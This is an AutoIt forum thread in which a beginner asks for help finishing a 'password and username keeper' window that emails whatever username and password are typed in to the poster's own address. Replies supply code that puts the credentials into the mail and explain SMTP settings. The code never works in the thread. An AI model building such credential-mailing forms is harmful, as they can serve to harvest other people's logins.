Im lost >;D help?

Hello there i know you maybe get mad becuse i reposted this 1.

but it would be really cool if you could help me so i can get this code to work:

#include <GUIConstants.au3>
#include <INet.au3>

Dim $getSelect1
Dim $getSelect2

#Region ### START Koda GUI section ### Form=
$Form1 = GUICreate("pass word and username keeper", 608, 428, 193, 125)
GUICtrlCreateInput("", 224, 192, 121, 21)
GUICtrlCreateInput("", 224, 240, 121, 21)
$Group1 = GUICtrlCreateGroup("pass word and username keeper", 112, 168, 273, 121)
GUICtrlCreateGroup("", -99, -99, 1, 1)
$Pic1 = GUICtrlCreatePic("", 0, 0, 628, 444, BitOR($SS_NOTIFY,$WS_GROUP,$WS_CLIPSIBLINGS))
$Username = GUICtrlCreateLabel("Username", 152, 192, 46, 17)
$password = GUICtrlCreateLabel("password", 152, 240, 49, 17)
$accept = GUICtrlCreateButton("accept", 300, 300, 80, 30, 0)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###

While 1
    $nMsg = GUIGetMsg()
    Switch $nMsg
        Case $GUI_EVENT_CLOSE
            Exit
        case $accept
            $getSelect1 = GUICtrlRead($Username)
            $getSelect2 = GUICtrlRead($password)
            _INetSmtpMail ( $s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress ,$s_Subject ,$as_Body)
            Exit
    EndSwitch
WEnd

thats the code i made, but clay made: for me

$getSelect1 = GUICtrlRead($Usernam)
            _INetSmtpMail ( $s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress ,$s_Subject ,$as_Body)
            Exit

now i just whant to know if anyone know what i need to do with

Exit

i know what the code do but what do i need to do with the code so it send the mail to my email : (an then my email) and the subject is (pass and name kepper)

do anyone know how i can done this code??? full???

Edited by dixo

---------------------------------------------------------------------------------------------------------------->>>>>>| |My scripts: |Warcraft lll auto login -- an auto login to warcraft lll ;) |Wow auto login -- an auto login to wow ;) | |---------------------------------------------------------------------------------------------------------------->>>>>>|

• Replies 46
  • Created
  • Last Reply

Top Posters In This Topic

Top Posters In This Topic

Posted Images

read the help file under _INetSmtpMail it pretty much says it all I think.

ye i know it just i cant find it in the help file ;(

---------------------------------------------------------------------------------------------------------------->>>>>>| |My scripts: |Warcraft lll auto login -- an auto login to warcraft lll ;) |Wow auto login -- an auto login to wow ;) | |---------------------------------------------------------------------------------------------------------------->>>>>>|

Use this under case $accept:

$s_Subject = "Username is: " & $getSelect1 & @CRLF & "Password is: " & $getSelect2
            _INetSmtpMail ( "Set the server of your mail here", "Password Keeper", "Password_Keeper@support.com", "The_email_you_want_to_send_the_mail_to",$s_Subject)

Then just put in your own datas..

Tell me if it works :)

Regards

Use this under case $accept:

$s_Subject = "Username is: " & $getSelect1 & @CRLF & "Password is: " & $getSelect2
            _INetSmtpMail ( "Set the server of your mail here", "Password Keeper", "Password_Keeper@support.com", "The_email_you_want_to_send_the_mail_to",$s_Subject)

Then just put in your own datas..

Tell me if it works :)

Regards

naaa i get an error ;(

it say the code in an box and then it says: uknown funtion name

and what are you meaning with:

Set the server of your mail here

server of mail???

explanation on what to put in the first field:

$s_SmtpServer: Smtp server the eMail is to be sent though May be either alpha or a numeric IP address. In order to fight spam, many ISPs require this to be their server.

eg "smtp.ispdomain.com", "mail.ispdomain.com" or "192.168.1.1".

Second try run this and see if you get any errors:

#include <INet.au3>

Dim $getSelect1
Dim $getSelect2

$Group1 = GUICtrlCreateGroup("pass word and username keeper", 112, 168, 273, 121)
$Usernam = GUICtrlCreateLabel("Username", 152, 192, 46, 17)
GUISetState(@SW_SHOW)

While 1
    $nMsg = GUIGetMsg()
    Switch $nMsg
        Case $GUI_EVENT_CLOSE
            Exit
        case $accept
            Exit
    EndSwitch
WEnd

explanation on what to put in the first field:

$s_SmtpServer: Smtp server the eMail is to be sent though May be either alpha or a numeric IP address. In order to fight spam, many ISPs require this to be their server.

eg "smtp.ispdomain.com", "mail.ispdomain.com" or "192.168.1.1".

Second try run this and see if you get any errors:

#include <INet.au3>

Dim $getSelect1
Dim $getSelect2

GUISetState(@SW_SHOW)

While 1
    $nMsg = GUIGetMsg()
    Switch $nMsg
        Case $GUI_EVENT_CLOSE
            Exit
        case $accept
            Exit
    EndSwitch
WEnd

naaa it dont get an error but i dont get the mail xD

i set the code in and do as you say then i start it up and then i press username and password then i accept and then it close, but i dont get the mail with the pass and name in :/

#include <INet.au3>

Dim $getSelect1

Dim $getSelect2

$Username = GUICtrlCreateLabel("Username", 152, 192, 46, 17)

GUISetState(@SW_SHOW)

While 1

$nMsg = GUIGetMsg()

Switch $nMsg

Case $GUI_EVENT_CLOSE

Exit

case $accept

$getSelect1 = GUICtrlRead($Username)

_INetSmtpMail ( "192.168.1.6", "Password Keeper", "Password_Keeper@support.com", "dannie93dk@hotmail.com",$s_Subject)

Exit

EndSwitch

WEnd

that is what the code im useing but i dont get the mail ;p

• Developers

As said... I don't see any error checking, but are you sure the SMTP relay host is the specified Ip address?

SciTE4AutoIt3 Full installer Download page   - Beta files       Read before posting     How to post scriptsource   Forum etiquette  Forum Rules 

Live for the present,
Dream of the future,
Learn from the past.
  :)

i set the code in and do as you say then i start it up and then i press username and password then i accept and then it close, but i dont get the mail with the pass and name in :/

It close because of the Exit command that you have put in the code after _INetSmtpMail

Have you change the datas in the function to the things that i wrote in the example? since I don't know your datas I can't put them in for you.

The most important is your email adress and then the mail server. you could try this as the server: "192.168.1.1"

sry im bad to english so what is

specified Ip address?

192.168.1.6 is my ip :)

Jos are right you could try using this with the error checking from the helpfile and tell us what it says:

#include <INet.au3>

Dim $getSelect1
Dim $getSelect2

GUISetState(@SW_SHOW)

While 1
    $nMsg = GUIGetMsg()
    Switch $nMsg
        Case $GUI_EVENT_CLOSE
            Exit
        case $accept
            $response = _INetSmtpMail ( "Set the server of your mail here", "Password Keeper", "Password_Keeper@support.com", "The_email_you_want_to_send_the_mail_to",$s_Subject)
            If $response = 1 Then
                MsgBox(0, "Success!", "Mail sent")
            Else
                MsgBox(0, "Error!", "Mail failed with error code " & @error)
            EndIf

Exit
    EndSwitch
WEnd

• Developers

sry im bad to english so what is

specified Ip address?

192.168.1.6 is my ip :)

OMG... how on earth am I going to explain this.....

Let me try it this way: When you use Outlook(express), what POP and SMTP hosts do you need to use ?

The SMTP host you would use there is what you need to use in the UDF.

Jos

Edited by Jos

SciTE4AutoIt3 Full installer Download page   - Beta files       Read before posting     How to post scriptsource   Forum etiquette  Forum Rules 

Live for the present,
Dream of the future,
Learn from the past.
  :)

are im so lost i just added the code you gived me

MsgBox(0, "Error!", "Mail failed with error code " & @error)

then i press accept it says : Mail failed with error code

;( dont understand that much english so i dont know where in the help file i can get the info you are talking about xD